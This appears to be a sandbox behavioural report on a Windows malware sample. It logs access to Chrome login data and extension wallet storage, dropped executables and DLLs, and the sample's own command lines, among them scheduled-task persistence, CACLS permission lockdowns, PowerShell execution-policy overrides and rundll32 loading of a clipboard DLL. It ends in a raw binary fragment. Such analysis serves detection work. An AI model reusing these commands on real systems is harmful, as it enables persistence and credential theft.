file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielpathgobddffflal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\gjagmgpathdbbciopjhllkdnddhcglnemk
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehpathddafch
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghpathoadd
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnpath
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj

Creates executable files on the filesystem (50 out of 55 events)

file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\ia7EY5bf.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\EhJ0QrY2FBP[1].js
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6JR6gF0.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\5ih1Ry7.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\_combined[1].js
file	C:\Users\test22\AppData\Local\Temp\1000064051\foto1661.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\wO6Ck20.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\login[1].js
file	C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\2Dy2976.exe
file	C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\1jo5ZChBkzZ[1].js
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7YD3dv41.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\prototype-1.7[1].js
file	C:\Users\test22\AppData\Local\Temp\kYLtko35qkbdxXvS.dll
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\4yJ653Pm.exe
file	C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\tooltip[1].js
file	C:\Users\test22\AppData\Local\Temp\1000062041\2.ps1
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\gC0mb5XShS_[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\main.10a25667.chunk[1].js
file	C:\Users\test22\AppData\Local\Temp\IXP006.TMP\rS4RY2Ex.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\5EA47Tb.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\nx7on92.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\manifest[1].js
file	C:\Users\test22\AppData\Local\Temp\IXP007.TMP\2VB535Hz.exe
file	C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\jquery-1.11.1.min[1].js
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6RE44dd.exe
file	C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\1sI72Ue2.exe
file	C:\Users\test22\AppData\Local\Temp\IXP006.TMP\3Sw6MV84.exe
file	C:\Users\test22\AppData\Local\Temp\1000065051\salo.exe
file	C:\Users\test22\AppData\Local\Temp\D4CF.tmp\D4E0.tmp\D4E1.bat
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\kT8ZN2eG.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\3sR15gk.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\login[1].js
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\global[1].js
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\WJ6Vx46.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\1000063051\tus.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\Nv3yt53.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\shared_responsive_adapter[1].js
file	C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe
file	C:\Users\test22\AppData\Local\Temp\F65C.tmp\F65D.tmp\F65E.bat
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\shared_global[1].js
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\IC5lf7sp.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\3.520a7eda.chunk[1].js
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\UM3WU63.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\1000062041\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (22 events)

cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\D4CF.tmp\D4E0.tmp\D4E1.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7YD3dv41.exe"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe" /tn "\WindowsAppPool\ujtOIdrpHPHQwyp"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe" /tn "\WindowsAppPool\1RGRO2VMheQXHJb"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe" /tn "\WindowsAppPool\HJrKFxe4WGaGi18"
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe" /tn "\WindowsAppPool\Rik3e2Qqnc0PuCo"
cmdline	Powershell.exe -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000062041\2.ps1"
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\F65C.tmp\F65D.tmp\F65E.bat C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6RE44dd.exe"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe" /tn "\WindowsAppPool\ESPCid2h8QyYJ9b"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe" /tn "\WindowsAppPool\kKAu9cP3NNRIkrC"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe" /tn "\WindowsAppPool\1RGRO2VMheQXHJb"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe" /tn "\WindowsAppPool\4eOZbn8zB4sFM67"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe" /tn "\WindowsAppPool\HJrKFxe4WGaGi18"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe" /tn "\WindowsAppPool\Rik3e2Qqnc0PuCo"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe" /tn "\WindowsAppPool\ESPCid2h8QyYJ9b"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe" /tn "\WindowsAppPool\4eOZbn8zB4sFM67"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe" /tn "\WindowsAppPool\ujtOIdrpHPHQwyp"
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe" /tn "\WindowsAppPool\kKAu9cP3NNRIkrC"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000062041\2.ps1"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

Drops a binary and executes it (10 events)

file	C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe
file	C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe
file	C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe
file	C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe
file	C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe
file	C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe
file	C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe
file	C:\Users\test22\AppData\Local\Temp\1000063051\tus.exe
file	C:\Users\test22\AppData\Local\Temp\1000064051\foto1661.exe
file	C:\Users\test22\AppData\Local\Temp\1000065051\salo.exe

Drops an executable to the user AppData folder (11 events)

file	C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe
file	C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe
file	C:\Users\test22\AppData\Local\Temp\1000063051\tus.exe
file	C:\Users\test22\AppData\Local\Temp\1000065051\salo.exe
file	C:\Users\test22\AppData\Local\Temp\1000064051\foto1661.exe
file	C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe
file	C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe
file	C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe
file	C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe

A process created a hidden window (24 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 3536 thread_handle: 0x00000300 process_identifier: 3512 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000304	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 3896 thread_handle: 0x0000030c process_identifier: 3892 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe" /tn "\WindowsAppPool\kKAu9cP3NNRIkrC" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000308	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 3964 thread_handle: 0x00000314 process_identifier: 3132 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000310	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 3296 thread_handle: 0x0000031c process_identifier: 3456 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe" /tn "\WindowsAppPool\ujtOIdrpHPHQwyp" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000318	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 4172 thread_handle: 0x00000324 process_identifier: 4168 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000320	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 4260 thread_handle: 0x0000032c process_identifier: 4256 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe" /tn "\WindowsAppPool\ESPCid2h8QyYJ9b" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000328	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 4508 thread_handle: 0x00000334 process_identifier: 4504 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000330	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 4640 thread_handle: 0x0000033c process_identifier: 4636 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe" /tn "\WindowsAppPool\HJrKFxe4WGaGi18" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000338	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 4728 thread_handle: 0x00000344 process_identifier: 4724 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000340	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 4808 thread_handle: 0x0000034c process_identifier: 4804 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe" /tn "\WindowsAppPool\Rik3e2Qqnc0PuCo" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000348	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 4932 thread_handle: 0x00000354 process_identifier: 4928 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000350	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 5024 thread_handle: 0x0000035c process_identifier: 5020 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe" /tn "\WindowsAppPool\1RGRO2VMheQXHJb" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000358	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 2944 thread_handle: 0x00000364 process_identifier: 5116 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000360	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 3200 thread_handle: 0x0000036c process_identifier: 160 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe" /tn "\WindowsAppPool\4eOZbn8zB4sFM67" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000368	1	1
ShellExecuteExW Nov. 3, 2023, 12:03 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe	1	1
ShellExecuteExW Nov. 3, 2023, 12:03 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Nov. 3, 2023, 12:03 p.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW Nov. 3, 2023, 12:03 p.m.	show_type: 0 filepath_r: Powershell.exe parameters: -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000062041\2.ps1" filepath: Powershell.exe	1	1
ShellExecuteExW Nov. 3, 2023, 12:03 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000063051\tus.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000063051\tus.exe	1	1
ShellExecuteExW Nov. 3, 2023, 12:03 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000064051\foto1661.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000064051\foto1661.exe	1	1
ShellExecuteExW Nov. 3, 2023, 12:03 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000065051\salo.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000065051\salo.exe	1	1
ShellExecuteExW Nov. 3, 2023, 12:04 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Nov. 3, 2023, 12:03 p.m.	show_type: 0 filepath_r: C:\Windows\sysnative\cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\D4CF.tmp\D4E0.tmp\D4E1.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7YD3dv41.exe" filepath: C:\Windows\sysnative\cmd	1	1
ShellExecuteExW Nov. 3, 2023, 12:04 p.m.	show_type: 0 filepath_r: C:\Windows\sysnative\cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\F65C.tmp\F65D.tmp\F65E.bat C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6RE44dd.exe" filepath: C:\Windows\sysnative\cmd	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x032c0000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process explothe.exe (4 events)

Time & API	Arguments	Status	Return
InternetReadFile Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁcAó/ / / Vp,¡/ Vp¡,/ Vp+¡/ Ê~+¡/ Ê~,¡/ Vp.¡/ . / Ê~¡Ö/ D~¡/ D~-¡/ Rich/ PEL·aDeà"2ØÑP@p@C P¨Jðb8b@@ .textC02 `.rdataP6@@.dataØ@ð$Î@À.idataò@ ò@@.bss` @À.00cfg @@.relocÏUV @BÌÌÌÌÌé½µé6Né é:é Mé6âé¨ÂéöétDéûD éMGéÉ÷é6éðSé?úéÉäé6^ éÄÓéé6é^é±éÐé_béq]éeLéÜuéÅé3é Jé²géØéVéÞ5é<)éÏéSéfgéìé1é6éÙôé3³éQiéàeé;é^Wé/õ éëêéØÒééÊ¡éÚùéUé56é é[héléÖéðéK écÇéÔséÐééé^úéÈ÷é@fé3né/;é¡;éóé8é1éÌoé¿éÁéèéè¥éNuéÜéÛé Ìé2ÔéÜéµué½Bé¯öé³Véã®éèEé#¼é&ééûXé oééÍ¹éñ é&éÀfé ébéPúéùéÂséaé;\|éñXéÉÞé% éÙ é/ÜéZåéùîéséx{ébéÒéÆI é Qé¸ÿé'é_ß ém¶é0né.yézéÛæéÂæéÝé¯zé\2é ñéÈ}é«ñéh0éò4é¸,é¬ éséÎDéSéãéÛééRpé ·éZùéuõéqzéccéíué éé Ùé\|éçé¢qéã,é©é ¦éÖ$ékOéaÅ é`ée éqk édäéêÜéL<éû²é.Ré\|8é=éÊé\|éKééaébQéeéÏé(ké! é£é%Àé)é4ñé·d ékôé·,é£é;é"Ié é.éÄéÓÐéO{é²éÉé`éo é¥Ãédéöb éG4épébA é éÓTé¸éÎéééÔ)é8ìéÔéèézóéËéséµäéÝéùçé éà8é\"é÷mé,éì¿éäé@ éÞé½wéí énhé-éú+é6béXéüé,é éðéÑéoLé¨Îé- éuéÒ éóékéJéªéë.é~béøé¡§ éb© é¡®é éì2éÝ¹é²Ûé/.é·kéñéVgé éEé@é÷æéæíérÈéR/é'-éÜTéÝ&éËé¸c éqaéKésùéÌòéeTéé]é@ÊéQ,é¡-éLéíéøé{éè.éa±éwéªU é: éQé°éáé¸ëéÕmé¢véÈé\)éniéçMéþ< é¨Z év0é{éÁ8é¶6é-ªé:ôé{&é ¼éäkéâéaéñJé¸ébìé¬¼é¸wéc#ér_ éßhéßmé\|éúréeôéi,é»é&âéøRéïüé¯êéÿBéVMé¾Mé=RéÀéóéóéL éÃé¥ôé×ésåéå4éQéÄé¬éUíé´(é`é(éfµé · éÞ´éÕé_4é³% éðñéö,éîéé9óé#£ é;iéJÕéQéÄ¶ éºBé÷þéØékéêþé éïGéhéÚéÖ_é ;éBèéª'é'XéYÇé!Bé~éé¤é¹àééÊ?é]né/té%·éÆuéléáéòéYé éömé( é¢é$øéO éñ é{éÕéûé¦éH<éøéBé 